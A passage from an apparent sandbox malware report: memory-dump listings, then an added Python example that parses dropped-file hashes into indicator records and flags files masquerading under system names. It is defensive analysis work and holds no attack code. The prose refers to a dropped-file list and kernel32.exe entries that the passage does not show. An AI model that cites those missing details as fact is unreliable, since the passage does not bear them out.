memory/1764-263-0x0000000004950000-0x0000000004951000-memory.dmp
Filesize: 4KB
-
memory/1764-264-0x0000000004950000-0x0000000004951000-memory.dmp
Filesize: 4KB
-
memory/1764-298-0x000000007EEB0000-0x000000007EEB1000-memory.dmp
Filesize: 4KB
-
memory/1764-297-0x0000000009720000-0x0000000009721000-memory.dmp
Filesize: 4KB
-
memory/1784-195-0x0000000000000000-mapping.dmp
-
memory/1872-139-0x0000000000000000-mapping.dmp
-
memory/2032-164-0x0000000000000000-mapping.dmp
-
memory/2036-205-0x0000000000000000-mapping.dmp
-
memory/2084-165-0x0000000000000000-mapping.dmp
-
memory/2216-196-0x0000000000000000-mapping.dmp
-
memory/2220-177-0x0000000000000000-mapping.dmp
-
memory/2224-184-0x0000000000000000-mapping.dmp
-
memory/2244-206-0x0000000000000000-mapping.dmp
-
memory/2336-199-0x0000000000000000-mapping.dmp
-
memory/2380-166-0x0000000000000000-mapping.dmp
-
memory/2400-174-0x0000000000000000-mapping.dmp
-
memory/2404-168-0x0000000000000000-mapping.dmp
-
memory/2420-191-0x0000000000000000-mapping.dmp
-
memory/2564-155-0x0000000000000000-mapping.dmp
-
memory/2564-526-0x0000000004F70000-0x0000000004F71000-memory.dmp
Filesize: 4KB
-
memory/2648-167-0x0000000000000000-mapping.dmp
-
memory/2784-118-0x0000000000400000-0x00000000004CC000-memory.dmp
Filesize: 816KB
-
memory/2880-140-0x0000000000000000-mapping.dmp
-
memory/3080-181-0x0000000000000000-mapping.dmp
-
memory/3092-207-0x0000000000000000-mapping.dmp
-
memory/3116-176-0x0000000000000000-mapping.dmp
-
memory/3192-189-0x0000000000000000-mapping.dmp
-
memory/3420-127-0x0000000000000000-mapping.dmp
-
memory/3424-180-0x0000000000000000-mapping.dmp
-
memory/3492-183-0x0000000000000000-mapping.dmp
-
memory/3500-148-0x0000000000000000-mapping.dmp
-
memory/3572-175-0x0000000000000000-mapping.dmp
-
memory/3628-122-0x0000000000C90000-0x0000000000C91000-memory.dmp
Filesize: 4KB
-
memory/3628-119-0x0000000000000000-mapping.dmp
-
memory/3676-151-0x0000000000000000-mapping.dmp
-
memory/3772-179-0x0000000000000000-mapping.dmp
-
memory/3780-211-0x0000000000000000-mapping.dmp
-
memory/3792-170-0x0000000000000000-mapping.dmp
-
memory/3852-208-0x0000000000000000-mapping.dmp
-
memory/3940-152-0x0000000000000000-mapping.dmp
-
memory/3960-193-0x0000000000000000-mapping.dmp
-
memory/4040-185-0x0000000000000000-mapping.dmp
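The dropped-file list above is what an analyst turns into indicators, and the text form the report was extracted into is awkward to consume: the hash label is fused to its value, and a file is listed once per write (kernel32.exe appears with the same four digests dozens of times, and the name itself is a system DLL's name reused for an executable under C:\ProgramData). The following is an added example, not part of the sandbox report or its vendor's tooling. It parses that flattened form into records, collapses repeats into a count, validates each digest by its length, looks a local file's bytes up by SHA256 with a cross-check of the other digests, and flags dropped files that borrow a system binary's name outside the Windows directory. The sample text is copied from the entries above and embedded as a constructed input; the set of system names is an illustrative assumption.

```python
"""Parse the flattened 'Downloads' list of a sandbox report into IOC records.
Added example for this page, not part of the sandbox's report or tooling."""
import hashlib
import re
from collections import namedtuple
from pathlib import PureWindowsPath

# Expected hex length of each digest; verifies the label/value split below.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Constructed sample: two entries copied from the report above, 7za.exe
# repeated as the report repeats it, in the flattened text the extractor
# produced, plus one memory-dump line the parser must skip.
SAMPLE_REPORT = """
-
C:\\ProgramData\\ConsoleApp\\7za.exeMD5
c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\\ProgramData\\ConsoleApp\\7za.exeMD5
c3d309156b8e8cf1d158de5fab1c2b40
SHA158ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA5122995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498
-
C:\\ProgramData\\ConsoleApp\\ControlSet000.batMD5
88105ac7d8d4bedefc5dafb4c0b8a5bf
SHA109eef2b0f85f9760ad744468474214c95f3872cc
SHA256145bb60685ba6f37aca0a5bd87728b6f8c06d130060b80dccb536ccd4943b992
SHA512f5bf945749e738e0962c47a393a2e33832e7ce482c263e39cfa2c3a9629d58972d9124ca723bfae72835ed7d2a1fb5fed7bd13a8fa9ab7ed0f761074fe503e58
-
memory/184-188-0x0000000000000000-mapping.dmp
"""

DroppedFile = namedtuple("DroppedFile", "path md5 sha1 sha256 sha512")

def _split_label(line):
    """Peel the fused label off a 'SHA1<hex>' style line, longest label first."""
    for label in ("SHA512", "SHA256", "SHA1"):
        if line.startswith(label):
            return label, line[len(label):].lower()
    raise ValueError(f"unlabelled hash line: {line!r}")

def parse_downloads(text):
    """Return {DroppedFile: times_listed}. Entries are separated by a line that
    is just '-'; a file record is the path with 'MD5' fused on, the MD5 value,
    then three fused SHA lines. Other blocks (memory dumps) are skipped."""
    records = {}
    for block in re.split(r"(?m)^-\s*$", text):
        lines = [ln.strip() for ln in block.splitlines() if ln.strip()]
        if len(lines) != 5 or not lines[0].endswith("MD5"):
            continue
        path = lines[0][: -len("MD5")]
        hashes = {"MD5": lines[1].lower()}
        hashes.update(_split_label(ln) for ln in lines[2:])
        for label, n in HASH_LEN.items():
            if not re.fullmatch(rf"[0-9a-f]{{{n}}}", hashes.get(label, "")):
                raise ValueError(f"{path}: malformed {label} digest")
        rec = DroppedFile(path, hashes["MD5"], hashes["SHA1"],
                          hashes["SHA256"], hashes["SHA512"])
        records[rec] = records.get(rec, 0) + 1
    return records

def digests_of(data):
    """All four digests of a byte string, keyed like HASH_LEN."""
    return {label: hashlib.new(label.lower(), data).hexdigest() for label in HASH_LEN}

def match(records, data):
    """Look a file's bytes up by SHA256. If the record's other digests disagree
    with the bytes, the IOC record itself is corrupt (mistyped), so raise."""
    d = digests_of(data)
    for rec in records:
        if rec.sha256 == d["SHA256"]:
            if (rec.md5, rec.sha1, rec.sha512) != (d["MD5"], d["SHA1"], d["SHA512"]):
                raise ValueError(f"{rec.path}: digests disagree, record is corrupt")
            return rec
    return None

# Illustrative names of system binaries that droppers reuse (chosen for this
# example, not taken from the report).
SYSTEM_NAMES = {"kernel32", "svchost", "csrss", "lsass", "explorer"}

def masquerades_as_system_file(path):
    """True when a dropped file borrows a system binary's name but sits outside
    the Windows directory, as ConsoleApp\\kernel32.exe in the report does."""
    p = PureWindowsPath(path)
    return p.stem.lower() in SYSTEM_NAMES and "windows" not in [s.lower() for s in p.parts]

if __name__ == "__main__":
    recs = parse_downloads(SAMPLE_REPORT)
    for rec, count in recs.items():
        print(count, rec.path, rec.sha256, masquerades_as_system_file(rec.path))
    print("local bytes matched:", match(recs, b"constructed bytes, not a dropped file"))
```

The length check is what makes the label split safe: the labels `SHA1`, `SHA256` and `SHA512` differ in their fourth character, and a digest that comes out 39 or 65 hex characters long means the line was mis-split or truncated, not that the indicator is wrong. SHA256 is the lookup key; MD5 and SHA1 are kept only so a record copied by hand can be cross-checked, since a match on one digest and a mismatch on the others points at a typo in the IOC rather than at the file.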